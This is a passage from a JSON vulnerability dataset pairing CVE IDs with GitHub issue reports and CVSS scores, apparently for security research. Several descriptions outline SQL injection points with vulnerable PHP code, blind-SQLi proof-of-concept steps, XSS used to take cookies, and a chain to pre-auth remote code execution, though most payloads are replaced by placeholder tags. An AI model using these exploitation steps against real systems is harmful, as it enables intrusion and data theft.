  69077. "description": "A stack buffer overflow occurs while parsing movie details. System Configuration APITAG version: atomicparsley APITAG Used arguments: T NUMBERTAG t + Environment APITAG system, version and so on): Ubuntu NUMBERTAG bit Additional information: compilation with asan Description Buffer overflow occurs while NUMBERTAG bit APITAG NUMBERTAG line) because the size of the APITAG NUMBERTAG line) is small NUMBERTAG bytes NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffd8c5 at pc NUMBERTAG ffff NUMBERTAG e NUMBERTAG d bp NUMBERTAG fffffffd5d0 sp NUMBERTAG fffffffcd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fffffffd8c5 thread T NUMBERTAG ffff NUMBERTAG e NUMBERTAG c ( PATHTAG NUMBERTAG fd NUMBERTAG in fread PATHTAG NUMBERTAG fd NUMBERTAG in APITAG , _IO_FILE , unsigned long) PATHTAG NUMBERTAG a NUMBERTAG a0 in APITAG , _IO_FILE , Trackage , APITAG ) PATHTAG NUMBERTAG a NUMBERTAG in APITAG , unsigned char) PATHTAG NUMBERTAG c NUMBERTAG e7 in real_main(int, char ) PATHTAG NUMBERTAG ffff NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG d in _start ( PATHTAG ) Address NUMBERTAG fffffffd8c5 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a NUMBERTAG df in APITAG , unsigned char) PATHTAG This frame has NUMBERTAG object(s): FILETAG",
  69078. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69079. "severity": "CRITICAL",
  69080. "baseScore": 9.8,
  69081. "impactScore": 5.9,
  69082. "exploitabilityScore": 3.9
  69083. },
  69084. {
  69085. "CVE_ID": "CVE-2021-37262",
  69086. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/23",
  69087. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/23",
  69088. "Repo_new": "jflyfox/jfinal_cms",
  69089. "Issue_Created_At": "2021-06-10T19:40:20Z",
  69090. "description": "[SECURITY] Denial of service because of unsafe regex processing. I have tried to contact you by EMAILTAG and created URLTAG asking for the contact. Nobody replied. The APITAG is vulnerable to regex injection that may lead to Denial of Service. User controlled path and APITAG are used to build and run a regex expression (first argument to APITAG URLTAG Since the attacker controls the string and the regex pattern he may cause a APITAG by regex catastrophic backtracking on the server side.",
  69091. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69092. "severity": "HIGH",
  69093. "baseScore": 7.5,
  69094. "impactScore": 3.6,
  69095. "exploitabilityScore": 3.9
  69096. },
  69097. {
  69098. "CVE_ID": "CVE-2021-37274",
  69099. "Issue_Url_old": "https://github.com/purple-WL/CNVD-2020-75301/issues/1",
  69100. "Issue_Url_new": "https://github.com/purple-wl/cnvd-2020-75301/issues/1",
  69101. "Repo_new": "purple-wl/cnvd-2020-75301",
  69102. "Issue_Created_At": "2021-09-25T03:51:14Z",
  69103. "description": "Kingdee KIS Professional Edition Insecure Permissions. Vulnerability submission record APITAG",
  69104. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69105. "severity": "HIGH",
  69106. "baseScore": 8.8,
  69107. "impactScore": 5.9,
  69108. "exploitabilityScore": 2.8
  69109. },
  69110. {
  69111. "CVE_ID": "CVE-2021-37381",
  69112. "Issue_Url_old": "https://github.com/caiteli/poc_information/issues/1",
  69113. "Issue_Url_new": "https://github.com/caiteli/poc_information/issues/1",
  69114. "Repo_new": "caiteli/poc_information",
  69115. "Issue_Created_At": "2021-07-28T10:24:17Z",
  69116. "description": "letter of thanks. Thank you for your submission about southsoft GMIS NUMBERTAG has a CSRF vulnerability ( CVETAG ). After receiving the vulnerability report, we verified and confirmed its effectiveness. We will fix this vulnerability as soon as possible in subsequent versions. Southsoft APITAG",
  69117. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69118. "severity": "HIGH",
  69119. "baseScore": 8.8,
  69120. "impactScore": 5.9,
  69121. "exploitabilityScore": 2.8
  69122. },
  69123. {
  69124. "CVE_ID": "CVE-2021-3747",
  69125. "Issue_Url_old": "https://github.com/canonical/multipass/issues/2261",
  69126. "Issue_Url_new": "https://github.com/canonical/multipass/issues/2261",
  69127. "Repo_new": "canonical/multipass",
  69128. "Issue_Created_At": "2021-09-28T03:23:29Z",
  69129. "description": "placeholder. Placeholder.",
  69130. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69131. "severity": "HIGH",
  69132. "baseScore": 7.8,
  69133. "impactScore": 5.9,
  69134. "exploitabilityScore": 1.8
  69135. },
  69136. {
  69137. "CVE_ID": "CVE-2021-37473",
  69138. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/26",
  69139. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/26",
  69140. "Repo_new": "navigatecms/navigate-cms",
  69141. "Issue_Created_At": "2021-07-22T04:24:26Z",
  69142. "description": "Multiple SQL Injection Vulnerabilities Identified in the latest version NUMBERTAG r NUMBERTAG Hi, I would like to report NUMBERTAG SQL Injection vulnerabilities identified in the latest version of the CMS. Vulnerability NUMBERTAG APITAG injection at APITAG vulnerable code: APITAG APITAG APITAG function APITAG { global $layout; global $DB; global $website; $out = ''; $item = new APITAG switch($_REQUEST FILETAG Vulnerability NUMBERTAG id at APITAG Vulnerable code APITAG : APITAG APITAG PATHTAG function APITAG { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new APITAG switch($_REQUEST['act']) { case \"change_comment_status\": // change comment status if(empty($_REQUEST['id'])) { echo \"false\"; APITAG } switch($_REQUEST['opt']) { case 'publish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; case 'unpublish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; case 'delete': $DB >execute(' DELETE FROM nv_comments WHERE website = '.$website >id.' AND APITAG id = '.$_REQUEST['id']); APITAG break; } APITAG APITAG Attacker can use a traffic similar to: CODETAG Vulnerability NUMBERTAG APITAG at APITAG Vulnerable code APITAG APITAG PATHTAG function APITAG { global $layout; global $DB; global $website; global $theme; global $user; $out = ''; $item = new APITAG switch($_REQUEST['act']) { case 'products_order': if(!empty($_POST['products order'])) { APITAG { // save new order APITAG $response = APITAG order']); APITAG if($response!==true) { echo $response['error']; } else { echo 'true'; } } } APITAG APITAG Then it triggers ERRORTAG Vulnerability NUMBERTAG id in APITAG Vulnerable code: APITAG APITAG PATHTAG case \"change_comment_status\": if(empty($_REQUEST['id'])) { echo \"false\"; APITAG } switch($_REQUEST['opt']) { case 'publish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; case 'unpublish': $DB >execute(' UPDATE nv_comments SET status NUMBERTAG APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; case 'delete': $DB >execute(' DELETE FROM nv_comments APITAG WHERE website = '.$website >id.' AND id = '.$_REQUEST['id']); APITAG break; } APITAG APITAG Attacker can easily craft something like this to trigger the vulnerability APITAG Vulnerability NUMBERTAG APITAG at APITAG vulnerable code: APITAG APITAG PATHTAG case 'load': case NUMBERTAG edit/new form if(!empty($_REQUEST['id'])) { APITAG { $item APITAG } else { $item APITAG } } if(isset($_REQUEST['form sent'])) { try { $item APITAG APITAG $item APITAG if(!empty($_REQUEST['property enabled'])) { $enableds = APITAG enabled']); } else { $enableds = APITAG } APITAG $item >id, $_REQUEST['template properties order'], $enableds); APITAG APITAG APITAG Then step into ERRORTAG Vulnerability NUMBERTAG APITAG at APITAG Vulnerable code: CODETAG Then steps into ERRORTAG Attacker can easily craft a traffic as below to cause the injection: APITAG",
  69143. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69144. "severity": "CRITICAL",
  69145. "baseScore": 9.8,
  69146. "impactScore": 5.9,
  69147. "exploitabilityScore": 3.9
  69148. },
  69149. {
  69150. "CVE_ID": "CVE-2021-37587",
  69151. "Issue_Url_old": "https://github.com/JHUISI/charm/issues/276",
  69152. "Issue_Url_new": "https://github.com/jhuisi/charm/issues/276",
  69153. "Repo_new": "jhuisi/charm",
  69154. "Issue_Created_At": "2021-07-21T14:01:46Z",
  69155. "description": "Broken schemes in last release . Hello, At CT RSA NUMBERTAG enema and Alpar presented attacks against NUMBERTAG schemes and two of them are implemented in the last version of CHARM: DAC MACS and MA ABE YJ NUMBERTAG FILETAG FILETAG Moreover, the YCT NUMBERTAG scheme was broken in NUMBERTAG and is also implemented in CHARM: FILETAG It is possible to attack the NUMBERTAG implementations and mount decryption attacks against them. References: URLTAG FILETAG",
  69156. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  69157. "severity": "MEDIUM",
  69158. "baseScore": 6.5,
  69159. "impactScore": 3.6,
  69160. "exploitabilityScore": 2.8
  69161. },
  69162. {
  69163. "CVE_ID": "CVE-2021-37593",
  69164. "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/3",
  69165. "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/3",
  69166. "Repo_new": "advisto/peel-shopping",
  69167. "Issue_Created_At": "2021-07-11T15:58:00Z",
  69168. "description": "SQL Injection in APITAG parameter APITAG Vulnerability Name: SQL Injection in APITAG parameter Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG Download link URLTAG Author: faisalfs NUMBERTAG ulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the \"_id_\" parameter on the PATHTAG endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data. Vulnerable URL: _ URLTAG Proof of Concept NUMBERTAG Assumed peel shopping NUMBERTAG out of box installation database name is _peel_. This query will check if APITAG name like _hex(%peel%)_ it will delay for NUMBERTAG seconds before redirect to homepage ( URLTAG that indicates TRUE SQL statement which mean the database name like \"_peel_\". url : URLTAG FILETAG NUMBERTAG Assumed the web is using APITAG database server check if db_version like APITAG it will delay for NUMBERTAG seconds if TRUE. url : URLTAG FILETAG NUMBERTAG By default, the database have a table name = peel_produits. This query will check if table_name _peel_produits_ is exist, it will delay for NUMBERTAG seconds if TRUE, else will redirect to homepage instantly. url : URLTAG FILETAG To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like APITAG (repeater). Error syntax: URLTAG NUMBERTAG FILETAG NUMBERTAG FILETAG Dump table name = peel_profil FILETAG Consequences: Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities. Integrity: Just as it may be possible to read sensitive information eg client/customer sensitive data, it is also possible to make changes or even delete this information with a SQL Injection attack. Mitigation: Use of Prepared Statements (with Parameterized Queries) References for Mitigation Vulnerability: FILETAG",
  69169. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  69170. "severity": "CRITICAL",
  69171. "baseScore": 9.1,
  69172. "impactScore": 5.2,
  69173. "exploitabilityScore": 3.9
  69174. },
  69175. {
  69176. "CVE_ID": "CVE-2021-37600",
  69177. "Issue_Url_old": "https://github.com/karelzak/util-linux/issues/1395",
  69178. "Issue_Url_new": "https://github.com/util-linux/util-linux/issues/1395",
  69179. "Repo_new": "util-linux/util-linux",
  69180. "Issue_Created_At": "2021-07-27T08:45:02Z",
  69181. "description": "Potential integer overflow in ipcutils.c. Hi, It seems that there exists a potential integer overflow that can lead buffer overflows. Please find the following description NUMBERTAG APITAG can be an arbitrary large number URLTAG NUMBERTAG Call to APITAG with the structure URLTAG NUMBERTAG Call to calloc with the large integer can cause a memory allocation with an overflowed size URLTAG",
  69182. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69183. "severity": "MEDIUM",
  69184. "baseScore": 5.5,
  69185. "impactScore": 3.6,
  69186. "exploitabilityScore": 1.8
  69187. },
  69188. {
  69189. "CVE_ID": "CVE-2021-37704",
  69190. "Issue_Url_old": "https://github.com/flextype/flextype/issues/567",
  69191. "Issue_Url_new": "https://github.com/flextype/flextype/issues/567",
  69192. "Repo_new": "flextype/flextype",
  69193. "Issue_Created_At": "2021-08-12T03:43:50Z",
  69194. "description": "phpinfo APITAG shows PHP information including values of APITAG cookies.. All NUMBERTAG ersions (prior to NUMBERTAG are affected. System Information Leak ( APITAG ) vulnerability in flextype NUMBERTAG ia the APITAG parameter to NUMBERTAG PATHTAG NUMBERTAG PATHTAG it's allows remote attackers to obtain configuration information via a phpinfo action in a request to FILETAG , which calls the phpinfo function. FILETAG FILETAG FILETAG FILETAG",
  69195. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  69196. "severity": "MEDIUM",
  69197. "baseScore": 4.3,
  69198. "impactScore": 1.4,
  69199. "exploitabilityScore": 2.8
  69200. },
  69201. {
  69202. "CVE_ID": "CVE-2021-37764",
  69203. "Issue_Url_old": "https://github.com/XOS-Shop/xos_shop_system/issues/1",
  69204. "Issue_Url_new": "https://github.com/xos-shop/xos_shop_system/issues/1",
  69205. "Repo_new": "xos-shop/xos_shop_system",
  69206. "Issue_Created_At": "2021-07-24T23:10:12Z",
  69207. "description": "Security Bug: Arbitrary File Deletion in Admin Panel. Hi MENTIONTAG , I found a file deletion vulnerability in the admin function module Vulnerability Name: Arbitrary File Deletion in Admin Panel Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG ulnerability Description: Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.",
  69208. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  69209. "severity": "HIGH",
  69210. "baseScore": 8.1,
  69211. "impactScore": 5.2,
  69212. "exploitabilityScore": 2.8
  69213. },
  69214. {
  69215. "CVE_ID": "CVE-2021-37770",
  69216. "Issue_Url_old": "https://github.com/NucleusCMS/NucleusCMS/issues/96",
  69217. "Issue_Url_new": "https://github.com/nucleuscms/nucleuscms/issues/96",
  69218. "Repo_new": "nucleuscms/nucleuscms",
  69219. "Issue_Created_At": "2019-12-02T16:20:24Z",
  69220. "description": "File upload vulnerability in Nucleus CMS NUMBERTAG Description: I found a file upload vulnerability. In this vulnerability, we can use upload to change the upload path to the path without. Htaccess file. Upload an. Htaccess file and write it to APITAG application / FILETAG . In this way, we can upload a picture with shell, treat it as PHP, execute our commands, so as to take down the whole website Resources and permissions for. Because I don't know why my picture can't be uploaded, so I wrote the detailed utilization process in this page, hope you can see it URLTAG I would like to submit this vulnerability to CVE mitre. I hope you can fix this vulnerability as soon as possible Looking forward to your response.",
  69221. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  69222. "severity": "HIGH",
  69223. "baseScore": 7.2,
  69224. "impactScore": 5.9,
  69225. "exploitabilityScore": 1.2
  69226. },
  69227. {
  69228. "CVE_ID": "CVE-2021-37778",
  69229. "Issue_Url_old": "https://github.com/osqzss/gps-sdr-sim/issues/294",
  69230. "Issue_Url_new": "https://github.com/osqzss/gps-sdr-sim/issues/294",
  69231. "Repo_new": "osqzss/gps-sdr-sim",
  69232. "Issue_Created_At": "2021-07-23T13:23:33Z",
  69233. "description": "There is a buffer overflow when parsing command line parameters. Hi friends! When the parameter length is greater than NUMBERTAG characters of MAX_CHAR, the strcpy function overflows. The length check can be performed to fix the problem. APITAG CODETAG",
  69234. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69235. "severity": "CRITICAL",
  69236. "baseScore": 9.8,
  69237. "impactScore": 5.9,
  69238. "exploitabilityScore": 3.9
  69239. },
  69240. {
  69241. "CVE_ID": "CVE-2021-37786",
  69242. "Issue_Url_old": "https://github.com/admin-ch/CovidCertificate-App-iOS/issues/146",
  69243. "Issue_Url_new": "https://github.com/admin-ch/covidcertificate-app-ios/issues/146",
  69244. "Repo_new": "admin-ch/covidcertificate-app-ios",
  69245. "Issue_Created_At": "2021-07-16T14:31:40Z",
  69246. "description": "Covid Check APITAG Crash App (dos). Hello, Small issue, a person could generate a QR code readable by the application (with an invalid signature), with the parameter \"dn\" containing the value APITAG the application will crashes each time the QR code is scanned, the problem is also present on Covid Cert but less problematic, indeed a possible scenario (with a bit of social engineering) is that a person creates a QR code with the payload that crashes the application and presents it to a third party (a restaurant for example), The third party can't check the validity of the certificate because the application will crashes at each scan, the third party could let the access to these services thinking that the certificate is valid and that it's a bug of the application. APITAG maybe extreme but with a lot of chances that it works). Payload : CODETAG APITAG Payload : CODETAG FILETAG Hoping to have helped ^^",
  69247. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69248. "severity": "MEDIUM",
  69249. "baseScore": 4.6,
  69250. "impactScore": 3.6,
  69251. "exploitabilityScore": 0.9
  69252. },
  69253. {
  69254. "CVE_ID": "CVE-2021-37791",
  69255. "Issue_Url_old": "https://github.com/cdfan/my-admin/issues/3",
  69256. "Issue_Url_new": "https://github.com/cdfan/my-admin/issues/3",
  69257. "Repo_new": "cdfan/my-admin",
  69258. "Issue_Created_At": "2021-07-28T06:35:05Z",
  69259. "description": "There is an ultra vires vulnerability in viewing personal center. Log in with user1 account on the trial website given by the author, and click the personal center to capture the package. poc: user1 login > PATHTAG CODETAG FILETAG",
  69260. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  69261. "severity": "MEDIUM",
  69262. "baseScore": 4.9,
  69263. "impactScore": 3.6,
  69264. "exploitabilityScore": 1.2
  69265. },
  69266. {
  69267. "CVE_ID": "CVE-2021-37840",
  69268. "Issue_Url_old": "https://github.com/aaPanel/aaPanel/issues/74",
  69269. "Issue_Url_new": "https://github.com/aapanel/aapanel/issues/74",
  69270. "Repo_new": "aapanel/aapanel",
  69271. "Issue_Created_At": "2021-06-23T07:11:42Z",
  69272. "description": "Security Vulnerability in APITAG Hi, I would like to report a security vulnerability in APITAG I am not sure this is the right place as its public and visible to all, would you like me to post the details here? or email?",
  69273. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69274. "severity": "HIGH",
  69275. "baseScore": 8.8,
  69276. "impactScore": 5.9,
  69277. "exploitabilityScore": 2.8
  69278. },
  69279. {
  69280. "CVE_ID": "CVE-2021-37914",
  69281. "Issue_Url_old": "https://github.com/argoproj/argo-workflows/issues/6441",
  69282. "Issue_Url_new": "https://github.com/argoproj/argo-workflows/issues/6441",
  69283. "Repo_new": "argoproj/argo-workflows",
  69284. "Issue_Created_At": "2021-07-28T16:14:54Z",
  69285. "description": "workflow re write vulnerability using input parameter. Summary It's possible to rewrite parts of a workflow on cluster using only an input parameter. Operators who allows users to run workflows specifying input parameters are vulnerable to this. Details From MENTIONTAG : It's possible to rewrite parts of a workflow on cluster using only an input parameter. This relies on taking advantage of the fact that the output of expression templates is evaluated a a literal part of the JSON stringified template. The following workflow accepts a string param, performs a trivial transformation (in this case, just printing it), and then passes the output as an env var to be printed. The poisoned param value is able to overwrite \"args\" because NUMBERTAG the golang JSON marshaler allows duplicate keys and NUMBERTAG the stringified template keys seem to be alphabetically ordered, so the poisoned \"env\" value can override the original \"args\" field. This is just a quick proof of concept. The motivated attacker could probably find a lot of different and nefarious ways to mutate a workflow. I believe this PR would close the vulnerability: URLTAG ERRORTAG Note: there seems to be some non determinism involved. The expected behavior is for the \"print\" step to output \"this happens instead\". If instead you get an error, re submit a few times. APITAG Message from the maintainers : Impacted by this bug? Give it a \ud83d\udc4d. We prioritise the issues with the most \ud83d\udc4d.",
  69286. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
  69287. "severity": "MEDIUM",
  69288. "baseScore": 6.5,
  69289. "impactScore": 2.5,
  69290. "exploitabilityScore": 3.9
  69291. },
  69292. {
  69293. "CVE_ID": "CVE-2021-3807",
  69294. "Issue_Url_old": "https://github.com/chalk/ansi-regex/issues/38",
  69295. "Issue_Url_new": "https://github.com/chalk/ansi-regex/issues/38",
  69296. "Repo_new": "chalk/ansi-regex",
  69297. "Issue_Created_At": "2021-09-14T15:37:45Z",
  69298. "description": "Backport of security patch, for benefit of yargs. I know it's a pain in the neck, but would you consider back porting URLTAG to the NUMBERTAG release line, for the benefit of yargs URLTAG . Yargs is making the effort during the transition to ESM to support both CJS and ESM, which makes us unable to update to the latest version of APITAG . If you were willing to make an exception (_I know you're pushing folks towards using ESM exclusively_) it would be really valuable for yargs users using CJK character sets.",
  69299. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69300. "severity": "HIGH",
  69301. "baseScore": 7.5,
  69302. "impactScore": 3.6,
  69303. "exploitabilityScore": 3.9
  69304. },
  69305. {
  69306. "CVE_ID": "CVE-2021-38113",
  69307. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387",
  69308. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/1387",
  69309. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  69310. "Issue_Created_At": "2021-08-04T12:12:19Z",
  69311. "description": "Stored XSS bug.. Description Inserting APITAG code into the APITAG Bouquet\" function in the Bouquet Editor leads to Stored XSS. The payload in the APITAG executes each time the user goes to the OWIF interface and redirects to a different webpage. APITAG Link to streamable URLTAG Image OS: APITAG Version NUMBERTAG Desktop Browser APITAG Version APITAG CODETAG",
  69312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69313. "severity": "MEDIUM",
  69314. "baseScore": 5.4,
  69315. "impactScore": 2.7,
  69316. "exploitabilityScore": 2.3
  69317. },
  69318. {
  69319. "CVE_ID": "CVE-2021-38115",
  69320. "Issue_Url_old": "https://github.com/libgd/libgd/issues/697",
  69321. "Issue_Url_new": "https://github.com/libgd/libgd/issues/697",
  69322. "Repo_new": "libgd/libgd",
  69323. "Issue_Created_At": "2021-04-30T18:12:52Z",
  69324. "description": "Read out of bound in TGA files. hello, this issue URLTAG is showing a read out of bound for a corrupted TGA FILETAG which is patched by adding some checks for APITAG . although the patch prevents occurring this vulnerability I saw that this function ( APITAG ) is used in APITAG too which there is no check for its return value again. I changed the header of the file which was used for the previous CVETAG . In fact, I changed the first byte to ff which is assigned to APITAG . FILETAG APITAG when I run the test with this input file ASAN shows this: ERRORTAG Is it showing another vulnerability?",
  69325. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69326. "severity": "MEDIUM",
  69327. "baseScore": 6.5,
  69328. "impactScore": 3.6,
  69329. "exploitabilityScore": 2.8
  69330. },
  69331. {
  69332. "CVE_ID": "CVE-2021-38138",
  69333. "Issue_Url_old": "https://github.com/helloxz/onenav/issues/26",
  69334. "Issue_Url_new": "https://github.com/helloxz/onenav/issues/26",
  69335. "Repo_new": "helloxz/onenav",
  69336. "Issue_Created_At": "2021-08-05T06:53:41Z",
  69337. "description": "APITAG add link function exists xss vul. add link function path FILETAG input xss payload NUMBERTAG APITAG alert(\"XSS\") APITAG FILETAG click \u6dfb\u52a0 button FILETAG alert xss success input xss payload NUMBERTAG APITAG APITAG FILETAG Get user cookie success",
  69338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69339. "severity": "MEDIUM",
  69340. "baseScore": 5.4,
  69341. "impactScore": 2.7,
  69342. "exploitabilityScore": 2.3
  69343. },
  69344. {
  69345. "CVE_ID": "CVE-2021-38167",
  69346. "Issue_Url_old": "https://github.com/hap-wi/roxy-wi/issues/285",
  69347. "Issue_Url_new": "https://github.com/hap-wi/roxy-wi/issues/285",
  69348. "Repo_new": "hap-wi/roxy-wi",
  69349. "Issue_Created_At": "2021-08-07T10:27:37Z",
  69350. "description": "multiple vulnerabilities leading to preauth RCE. i found haproxy wi in aws/digitalocean marketplace when i was looking for a solution to manage multiple reverse proxies, since it was opensource i peaked at how it works and found some critical issues when combined leading to pre auth RCE \\ SQL injections: Inside APITAG some SQL statements have user controlled input supplied directly into SQL queries \\ \\ Unauthenticated SQLi when an attacker request any of the pages inside APITAG folder, authentication is checked via APITAG CODETAG APITAG takes uuid cookie value and try to update expiration timestamp for the given uuid with APITAG ERRORTAG uuid cookie value is directly supplied into the query, so an unauthenticated attacker can perform a blind SQL injection to dump the database or extract a valid uuid to bypass authentication \\ \\ authenticated SQLi One example of authenticated SQLi via reaching select_servers function ERRORTAG there's multiple injection points from user supplied input here one way to reach this is from hapservers.py CODETAG this could be exploited by least privilege account such as guest There's some more functions supplying user input to SQL queries \\ Command injection: Inside APITAG and APITAG some commands executed are supplied with user input one of many examples of a second order command injection here: CODETAG haproxy_sock_port is stored in settings table, and an authenticated user can change it from APITAG then calls options page to call that function and execute arbitrary system command most cmds in different functions are prone to command injection or second order from settings stored in the database and user controlled \\ Conclusion combining both unauthenticated SQLi to grab a valid uuid and bypass authentication, then use command injection an unauthenticated user can achieve pre auth RCE",
  69351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69352. "severity": "CRITICAL",
  69353. "baseScore": 9.8,
  69354. "impactScore": 5.9,
  69355. "exploitabilityScore": 3.9
  69356. },
  69357. {
  69358. "CVE_ID": "CVE-2021-38197",
  69359. "Issue_Url_old": "https://github.com/gen2brain/go-unarr/issues/21",
  69360. "Issue_Url_new": "https://github.com/gen2brain/go-unarr/issues/21",
  69361. "Repo_new": "gen2brain/go-unarr",
  69362. "Issue_Created_At": "2021-08-08T06:51:14Z",
  69363. "description": "There is a vulnerability in unarr, which will lead to path traversal vulnerability. There is a vulnerability in unarr, which will lead to path traversal vulnerability Go unarr does not check the contents of the archive. Exploit process NUMBERTAG An attacker can construct a malicious tar package (or any compressed archive file). As shown in the figure below, obviously, this will not succeed under the tar command, because the tar command fixes the vulnerability. FILETAG NUMBERTAG The victim uses go unarr to unzip the archive As shown in the figure below, path traversal occurs during go unarr decompression, and we upload the file to the.. / directory FILETAG NUMBERTAG By triggering the path traversal vulnerability, an attacker can store any file in any privileged place (which means that rce can be caused under root privileges)",
  69364. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69365. "severity": "CRITICAL",
  69366. "baseScore": 9.8,
  69367. "impactScore": 5.9,
  69368. "exploitabilityScore": 3.9
  69369. },
  69370. {
  69371. "CVE_ID": "CVE-2021-38221",
  69372. "Issue_Url_old": "https://github.com/mlogclub/bbs-go/issues/112",
  69373. "Issue_Url_new": "https://github.com/mlogclub/bbs-go/issues/112",
  69374. "Repo_new": "mlogclub/bbs-go",
  69375. "Issue_Created_At": "2021-07-08T08:49:52Z",
  69376. "description": "There are several stored XSS vulnerabilities. Affected version NUMBERTAG all versions yet) Including Custom Edition I guess. Usage of \"v html\" tag should be really careful in vue. I found several unsafe usage in bbs go webpage which data source might be from any user. It's necessary to filter the rich text before it is posted to the client. Otherwise it will be dangerous. Here is the XSS attack example screenshot (one of them) : FILETAG And the unsafe \"v html\" tag for topic content (one of them) : FILETAG I will report the poc code after mlogclub team confirm and fix this defect.",
  69377. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69378. "severity": "MEDIUM",
  69379. "baseScore": 5.4,
  69380. "impactScore": 2.7,
  69381. "exploitabilityScore": 2.3
  69382. },
  69383. {
  69384. "CVE_ID": "CVE-2021-38290",
  69385. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/580",
  69386. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/580",
  69387. "Repo_new": "daylightstudio/fuel-cms",
  69388. "Issue_Created_At": "2021-08-06T01:58:06Z",
  69389. "description": "Host header attack vulnerability exists in fuel CMS NUMBERTAG An attacker can use man in the middle attack to attack users such as phishing.. The system does not verify the host value. If the host value is modified, the link returned by the website will splice the malicious host value\u3002like this\uff1a FILETAG FILETAG",
  69390. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69391. "severity": "HIGH",
  69392. "baseScore": 8.1,
  69393. "impactScore": 5.9,
  69394. "exploitabilityScore": 2.2
  69395. },
  69396. {
  69397. "CVE_ID": "CVE-2021-38311",
  69398. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2685",
  69399. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2685",
  69400. "Repo_new": "contiki-os/contiki",
  69401. "Issue_Created_At": "2021-08-08T13:24:15Z",
